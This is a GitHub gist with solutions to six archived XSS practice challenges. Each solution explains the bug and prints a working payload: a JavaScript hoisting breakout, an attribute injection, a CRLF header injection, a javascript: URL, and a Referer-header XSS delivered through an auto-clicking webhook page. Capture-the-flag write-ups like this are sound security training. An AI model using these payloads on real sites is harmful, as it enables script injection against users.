Skip to content

Instantly share code, notes, and snippets.

@Sankalpa-Acharya

Sankalpa-Acharya/Readme.md

Last active January 15, 2024 14:11
Show Gist options
  • Save Sankalpa-Acharya/a7b905ea59ac3f621e164a40cedcc77c to your computer and use it in GitHub Desktop.
Save Sankalpa-Acharya/a7b905ea59ac3f621e164a40cedcc77c to your computer and use it in GitHub Desktop.
Download ZIP
Solution of XSS Challenges [Archive - 2015] By Mazin Ahmed
Raw
Readme.md

XSS Challenge 1

Breaking out of js object and adding alert function will not work here beacuse

parent.Arbiter.inform("data", {"id":"});

This particular JS code is making an error at first which will then not allow our alert function to execute.

So now what's the error ?
Arbiter is undefined in code so accessing anything from it will cause error.

In JavaScript, Hoisting refers to the process whereby the interpreter appears to move the declaration of functions, variables or classes to the top of their scope, prior to execution of the code.
Using this concept we can solve this challenge. 

// Payload
alert`xss`});function Arbiter(){};//

XSS Challenge 2

Our input is being Reflected in input tag which is hidden

//paylaod 
hello" autofocus onfocus=alert('xss') type="text

XSS Challenge 3

Same as Challenge 1

// Payload
alert`xss`});function Arbiter(){};//

XSS Challenge 4

This lab is the combination of CRLF Injection and XSS

Payload
%0AContent-Type%3A%20Sankalpa%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20texml%0A%3Cimg%20src%3Dx%20onerror%3Dalert(%27xss%27)%3E

XSS Challenge 5

//payload
https://javascript%27%20autofocus%20onfocus='alert``

XSS Challenge 6

This Lab is interesting😉.
We can easily inject

<img src=x onerror=alert('xss')>

in the Referer Header. But the main challenge is how can we send payload in the Referer Header without adding manually?

For this Our domain should be something like this

https://<img src=x onerror=alert('xss')>.com

Which is not possible, But we can definitely do this.

https://sankalpa.info.np/<img src=x onerror=alert('xss')>

I used this webhook.site site to exploit it.

  1. Create your webhook URL
  2. Click on the edit icon which is on the top right hand side.
  3. Change content type to text/html
  4. Paste below code in the body section and save.
<a id="ss" href="https://secbot-xss-challenges.vercel.app/xss-challenge6.php" >click me</a>

<script>
document.getElementById('ss').click()
</script>

Your Web Hook URL should be like this https://webhook.site/<UUID>/<img src=x onerror=alert('xss')>/

When you visit the webhook URL you will be redirected to https://secbot-xss-challenges.vercel.app/xss-challenge6.php with an alert pop up.

Thanks For Reading ❤️

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment